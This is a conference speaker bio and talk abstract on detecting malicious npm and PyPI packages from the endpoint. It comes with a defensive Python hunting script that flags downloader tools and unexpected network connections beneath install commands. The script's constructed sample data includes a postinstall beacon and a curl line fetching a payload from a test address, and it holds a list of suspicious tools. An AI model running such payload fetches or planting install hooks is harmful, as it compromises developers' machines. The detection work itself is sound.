Bar Matalon

Bar Matalon is the Threat Intelligence Team Lead at Palo Alto Networks’ Cortex research department, and has over a decade of experience in cyber intelligence research. Bar has worked as a threat intelligence researcher in several international companies, including Novartis Pharmaceuticals and Intel Corporation.


Session

04-16
10:00
30min
Thinking Outside the Package: Hunting Supply Chain Behavior from the Endpoint Perspective
Bar Matalon, Noa Dekel

For years, software supply chain security in ecosystems like npm and PyPI was treated as a "developer problem": an issue delegated to posture management tools and policy enforcement. However, the threat landscape has fundamentally changed. Since 2025, we are no longer facing just simple credential stealers; we are witnessing massive, sophisticated campaigns involving destructive malware and self-replicating worms.
This shift is exacerbated by the explosion of "vibe coding" and AI-assisted development. As the definition of "developer" expands, more users are implementing code they do not fully understand, while attackers leverage AI to compromise packages or hallucinate new ones at scale.
In this session, we start by analyzing the anatomy of these modern compromises: how they happen and what they typically execute. Then, we strip away the abstraction. When a developer runs npm install or pip install, they aren't just downloading code; they are executing a process tree with the full privileges of that user.
We will demonstrate that visibility into the endpoint is the missing link in supply chain defense. By the time a malicious package is reported and removed from the public registry, it is often too late: the code has already run. We will expose the attacker’s playbook, dissecting notable campaigns to reveal their tradecraft. We will break down every step of the kill chain, mapping the attacks from the initial install command to the malicious child processes and network beacons.
Attendees will leave with more than just theory. The session concludes with practical hunting tips and specific query logic, empowering defenders to detect these anomalies in their own environments and spot the signs of a compromised supply chain before it spreads.
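As an added illustration of the endpoint-side view the abstract describes (this is example code written for this page, not the speakers' query logic or any Cortex product feature), the script below builds a process tree from constructed endpoint events, finds the processes rooted at an npm or pip install, and flags two anomalies: downloader or encoder tools spawned beneath the install, and outbound connections to hosts other than the expected package registries. The telemetry fields (pid, ppid, image, cmdline, destination host), the allow-listed registry hosts and all sample events are assumptions for the example.

```python
"""Hunt for suspicious child processes and network beacons under package-manager installs.

Added example for this page; not the talk's own query logic. Assumes endpoint telemetry
that records, per process, a pid, ppid, image name, command line and the destination
hosts it connected to. Every event below is constructed.
"""
from dataclasses import dataclass, field

# Images that typically run an install (the package managers and the runtimes behind them).
INSTALLER_IMAGES = {"npm", "npm.cmd", "node", "pip", "pip3", "python", "python3"}
INSTALL_MARKERS = ("npm install", "npm ci", "pip install", "-m pip install")
# Tools a routine install has little reason to launch. Shells are deliberately absent:
# npm runs lifecycle scripts via `sh -c`, so a shell alone is expected; what it launches matters.
SUSPICIOUS_IMAGES = {"curl", "wget", "powershell.exe", "pwsh", "certutil.exe", "base64"}
# Hosts an install is expected to reach (assumption; tune to the environment's mirrors/proxies).
ALLOWED_HOSTS = {"registry.npmjs.org", "pypi.org", "files.pythonhosted.org"}


@dataclass
class Process:
    pid: int
    ppid: int
    image: str
    cmdline: str
    connections: list = field(default_factory=list)  # destination hosts observed


def is_install_root(p):
    """True when this process is the install command itself."""
    return p.image in INSTALLER_IMAGES and any(m in p.cmdline for m in INSTALL_MARKERS)


def ancestors(p, by_pid):
    """Yield parents upward; stops at a missing parent or a pid cycle in the telemetry."""
    seen = set()
    cur = by_pid.get(p.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def hunt(events):
    """Return (finding_type, install_root_pid, pid, image, detail) tuples."""
    by_pid = {p.pid: p for p in events}
    findings = []
    for p in events:
        # The install root is either this process or the nearest install command above it.
        root = p if is_install_root(p) else next(
            (a for a in ancestors(p, by_pid) if is_install_root(a)), None)
        if root is None:
            continue  # not part of any install's process tree: out of scope for this hunt
        if p.image in SUSPICIOUS_IMAGES:
            findings.append(("suspicious_child", root.pid, p.pid, p.image, p.cmdline))
        for host in p.connections:
            if host not in ALLOWED_HOSTS:
                findings.append(("unexpected_egress", root.pid, p.pid, p.image, host))
    return findings


def sample_events():
    """Constructed telemetry: one npm install with a malicious postinstall, one clean pip install."""
    return [
        Process(100, 1, "bash", "bash"),                                     # developer's shell
        Process(200, 100, "node", "npm install example-pkg", ["registry.npmjs.org"]),
        Process(300, 200, "sh", "sh -c node postinstall.js"),                # npm's lifecycle shell
        Process(400, 300, "node", "node postinstall.js", ["203.0.113.10"]),  # beacon to TEST-NET address
        Process(500, 400, "curl", "curl http://203.0.113.10/payload"),       # downloader under the install
        Process(600, 1, "curl", "curl https://example.com"),                 # unrelated curl, not flagged
        Process(700, 100, "python3", "python3 -m pip install example-pkg",
                ["pypi.org", "files.pythonhosted.org"]),                     # clean install, not flagged
    ]


if __name__ == "__main__":
    for finding in hunt(sample_events()):
        print(finding)
```

Run as-is, the script reports the beacon from pid 400 and the curl at pid 500, both attributed to the install root 200, while the developer's own curl (pid 600) and the pip install (pid 700) produce nothing. Scoping the rules to the install's process tree, rather than to "any curl anywhere", is what keeps this kind of hunt quiet enough to run continuously.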

Main conference
Amphitheater